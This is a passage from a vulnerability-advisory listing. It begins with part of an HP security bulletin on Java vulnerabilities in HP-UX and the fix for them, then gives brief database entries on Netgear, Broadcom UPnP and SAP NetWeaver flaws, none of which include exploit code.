CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners
| VAR-201301-0497 | No CVE | Netgear SPH200D Multiple Security Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
The Netgear SPH200D is a dual mode cordless Skype phone. There are multiple input validation vulnerabilities in the Netgear SPH200D. Allows an attacker to exploit vulnerabilities for directory traversal and cross-site scripting attacks to obtain sensitive information or hijack user sessions.
Exploiting these issues will allow an attacker to steal cookie-based authentication information, execute arbitrary scripts in the context of the browser, bypass security restrictions, perform unauthorized actions, and gain access to the local files and sensitive information. Information harvested may aid in launching further attacks.
Netgear SPH200D Firmware 1.0.4.80 is vulnerable; other versions may also be affected
| VAR-201301-0513 | No CVE | Broadcom UPnP Stack ‘ SetConnectionType() 'Function Format String Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Broadcom UPnP is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will likely result in a denial-of-service condition.
| VAR-201301-0498 | No CVE | SAP NetWeaver J2EE AdapterFramework Servlet Information Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver J2EE AdapterFramework Servlet has an unspecified error that allows an attacker to exploit the vulnerability to obtain SAP versions and other sensitive information. SAP NetWeaver is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks
| VAR-201301-0514 | No CVE | SAP NetWeaver CCMS service XML Parser Information Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an error in the CCMS service XML parser when validating the XML request. Allows an attacker to exploit a vulnerability to obtain local file information. SAP NetWeaver is prone to an information-disclosure vulnerability